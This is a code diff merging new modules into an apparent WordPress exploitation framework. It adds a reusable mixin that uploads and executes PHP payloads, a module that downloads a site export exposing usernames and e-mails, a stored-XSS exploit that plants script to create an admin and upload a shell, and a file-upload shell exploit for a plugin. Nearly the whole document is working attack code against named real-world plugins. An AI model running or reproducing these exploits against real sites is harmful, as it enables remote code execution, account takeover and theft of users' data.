Merge pull request #9 from rastating/new_modules

New modules and ShellUpload mixin

Author: rastating

lib/wpxf/core.rb

@@ -28,5 +28,6 @@
 require 'wpxf/wordpress/xss'
 require 'wpxf/wordpress/reflected_xss'
 require 'wpxf/wordpress/staged_reflected_xss'
+require 'wpxf/wordpress/shell_upload'
 
 require 'wpxf/core/module'

lib/wpxf/wordpress/shell_upload.rb

@@ -0,0 +1,131 @@
+# Provides reusable functionality for shell upload modules.
+module Wpxf::WordPress::ShellUpload
+  include Wpxf
+
+  # Initialize a new instance of {ShellUpload}
+  def initialize
+    super
+    @session_cookie = nil
+    @upload_result = nil
+    @payload_name = nil
+    @info[:desc] = 'This module exploits a file upload vulnerability '\
+                   'which allows users to upload and execute PHP '\
+                   'scripts in the context of the web server.'
+
+    register_advanced_options([
+      IntegerOption.new(
+        name: 'payload_name_length',
+        desc: 'The number of characters to use when generating the payload name',
+        required: true,
+        default: rand(5..10),
+        min: 1,
+        max: 256
+      )
+    ])
+
+    if requires_authentication
+      register_options([
+        StringOption.new(
+          name: 'username',
+          desc: 'The WordPress username to authenticate with',
+          required: true
+        ),
+        StringOption.new(
+          name: 'password',
+          desc: 'The WordPress password to authenticate with',
+          required: true
+        )
+      ])
+    end
+  end
+
+  # @return [Boolean] true if the module requires the user to authenticate.
+  def requires_authentication
+    false
+  end
+
+  # @return [HttpResponse, nil] the {Wpxf::Net::HttpResponse} of the upload operation.
+  def upload_result
+    @upload_result
+  end
+
+  # @return [String] the file name of the payload, including the file extension.
+  def payload_name
+    @payload_name
+  end
+
+  # @return [String] the URL of the file used to upload the payload.
+  def uploader_url
+  end
+
+  # @return [BodyBuilder] the {Wpxf::Utility::BodyBuilder} used to generate the uploader form.
+  def payload_body_builder
+  end
+
+  # @return [String] the URL of the payload after it is uploaded to the target.
+  def uploaded_payload_location
+  end
+
+  # Run the module.
+  # @return [Boolean] true if successful.
+  def run
+    return false unless super
+
+    if requires_authentication
+      @session_cookie = authenticate_with_wordpress(datastore['username'], datastore['password'])
+      return false unless @session_cookie
+    end
+
+    emit_info 'Preparing payload...'
+    @payload_name = "#{Utility::Text.rand_alpha(payload_name_length)}.php"
+    builder = payload_body_builder
+    return false unless builder
+
+    emit_info 'Uploading payload...'
+    return false unless upload_payload(builder)
+
+    payload_url = uploaded_payload_location
+    emit_success "Uploaded the payload to #{payload_url}", true
+
+    emit_info 'Executing the payload...'
+    execute_payload(payload_url)
+
+    true
+  end
+
+  # @return [String, nil] the current session cookie, if authenticated with the target.
+  def session_cookie
+    @session_cookie
+  end
+
+  private
+
+  def payload_name_length
+    normalized_option_value('payload_name_length')
+  end
+
+  def upload_payload(builder)
+    builder.create do |body|
+      @upload_result = execute_post_request(url: uploader_url, body: body, cookie: @session_cookie)
+    end
+
+    if @upload_result.nil? || @upload_result.timed_out?
+      emit_error 'No response from the target'
+      return false
+    end
+
+    if @upload_result.code != 200
+      emit_info "Response code: #{@upload_result.code}", true
+      emit_info "Response body: #{@upload_result.body}", true
+      emit_error 'Failed to upload payload'
+      return false
+    end
+
+    true
+  end
+
+  def execute_payload(payload_url)
+    res = execute_get_request(url: payload_url, cookie: @session_cookie)
+    emit_success "Result: #{res.body}" if res && res.code == 200 && !res.body.strip.empty?
+  end
+end

modules/auxiliary/ghost_unrestricted_export_download.rb

@@ -0,0 +1,92 @@
+class Wpxf::Auxiliary::GhostUnrestrictedExportDownload < Wpxf::Module
+  include Wpxf
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Ghost Plugin <= 0.5.5 - Unrestricted Export Download',
+      desc: 'This module utilises a lack of user level validation in versions '\
+            '<= 0.5.5 of the Ghost plugin to download an export of the WordPress '\
+            'data, including usernames and e-mail addresses.',
+      author: [
+        'Josh Brody',                      # Disclosure
+        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8479']
+      ],
+      date: 'May 02 2016'
+    )
+
+    register_options([
+      IntegerOption.new(
+        name: 'http_client_timeout',
+        desc: 'Max wait time in seconds for HTTP responses',
+        default: 300,
+        required: true
+      ),
+      StringOption.new(
+        name: 'export_path',
+        desc: 'The file to save the JSON export to',
+        required: true
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_readme('ghost', '0.5.6')
+  end
+
+  def export_path
+    normalized_option_value('export_path')
+  end
+
+  def download_url
+    normalize_uri(wordpress_url_admin, 'tools.php')
+  end
+
+  def print_detected_users
+    file = File.read(export_path)
+    json = JSON.parse(file)
+    users = json['data']['users']
+
+    if users
+      users_table = [{ name: 'Username', email: 'E-mail' }]
+      users.each do |user|
+        users_table.push(name: user['name'], email: user['email'])
+      end
+
+      emit_success "Found #{users.length} users"
+      emit_table users_table
+    end
+  rescue
+    emit_error 'Failed to parse the download. The plugin may be disabled or the export may be corrupt.'
+  end
+
+  def run
+    return false unless super
+
+    emit_info 'Downloading website export...'
+    res = download_file(
+      url: download_url,
+      method: :get,
+      params: { 'ghostexport' => 'true', 'submit' => 'Download Ghost file' },
+      local_filename: export_path
+    )
+
+    if res.timed_out?
+      emit_error 'Request timed out, try increasing the http_client_timeout'
+      return false
+    end
+
+    if res.code != 200
+      emit_error "Server responded with code #{res.code}"
+      return false
+    end
+
+    print_detected_users
+    emit_success "Saved export to #{export_path}"
+    true
+  end
+end

modules/exploits/dw_question_answer_stored_xss_shell_upload.rb

@@ -0,0 +1,89 @@
+class Wpxf::Exploit::DwQuestionAnswerStoredXssShellUpload < Wpxf::Module
+  include Wpxf
+  include Wpxf::WordPress::Xss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'DW Question & Answer <= 1.4.2.2 Stored XSS Shell Upload',
+      desc: 'This module exploits a lack of input validation in versions '\
+            '<= 1.4.2.2 of the DW Question & Answer plugin which '\
+            'allows unauthenticated users to store a script that will '\
+            'create a new admin user and use the new credentials to '\
+            'upload and execute a payload when an admin views the page.',
+      author: [
+        'Rahul Pratap Singh',             # Vulnerability discovery
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['URL', 'https://0x62626262.wordpress.com/2016/03/11/dw-question-answer-xss-vulnerability/'],
+        ['WPVDB', '8413']
+      ],
+      date: 'Mar 11 2016'
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'permalink',
+        desc: 'The permalink to the ask a question page',
+        default: '/?page_id=120',
+        required: true
+      )
+    ])
+  end
+
+  def check
+    check_plugin_version_from_readme('dw-question-answer', '1.4.2.3')
+  end
+
+  def permalink
+    normalize_uri(full_uri, datastore['permalink'])
+  end
+
+  def fetch_nonce
+    res = execute_get_request(url: permalink)
+    return res.body[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1] if res && res.code == 200
+  end
+
+  def store_script
+    execute_post_request(
+      url: normalize_uri(full_uri, datastore['permalink']),
+      body: {
+        'question-title' => Utility::Text.rand_alpha(10),
+        'question-content' => Utility::Text.rand_alpha(10),
+        'question-category' => Utility::Text.rand_numeric(1),
+        'question-tag' => Utility::Text.rand_alpha(5),
+        '_dwqa_anonymous_email' => Utility::Text.rand_email,
+        '_dwqa_anonymous_name' => "\"><script>#{xss_ascii_encoded_include_script}</script><",
+        'dwqa-question-submit' => 'Submit',
+        '_wpnonce' => fetch_nonce,
+        '_wp_http_referer' => datastore['permalink']
+      }
+    )
+  end
+
+  def run
+    return false unless super
+
+    @success = false
+    emit_info 'Storing script...'
+    emit_info xss_ascii_encoded_include_script, true
+    res = store_script
+
+    if res.nil?
+      emit_error 'No response from the target'
+      return false
+    end
+
+    if res.code != 200
+      emit_error "Server responded with code #{res.code}"
+      return false
+    end
+
+    emit_success 'Script stored and will be executed when a user views the question'
+    start_http_server
+
+    @success
+  end
+end

modules/exploits/tevolution_shell_upload.rb

@@ -0,0 +1,48 @@
+class Wpxf::Exploit::TevolutionShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Tevolution < 2.3.0 Shell Upload',
+      author: [
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8482'],
+        ['URL', 'https://templatic.com/news/security-vulnerability-found-themes/']
+      ],
+      date: 'Apr 23 2016'
+    )
+  end
+
+  def check
+    change_log = normalize_uri(plugin_url, 'change_log.txt')
+    check_version_from_custom_file(change_log, /\(Version\s(\d\.\d\.\d)\)/, '2.3.0')
+  end
+
+  def plugin_url
+    normalize_uri(wordpress_url_plugins, 'Tevolution')
+  end
+
+  def uploader_url
+    normalize_uri(plugin_url, 'tmplconnector', 'monetize', 'templatic-custom_fields', 'single-upload.php')
+  end
+
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_file_from_string(Utility::Text.rand_alpha(5), payload.encoded, payload_name)
+    builder
+  end
+
+  def scrape_current_theme
+    res = execute_get_request(url: full_uri)
+    res.body[/\/wp-content\/themes\/(.*?)\//, 1] if res && res.body
+  end
+
+  def uploaded_payload_location
+    theme = scrape_current_theme
+    normalize_uri(wordpress_url_themes, theme, 'images', 'tmp', payload_name)
+  end
+end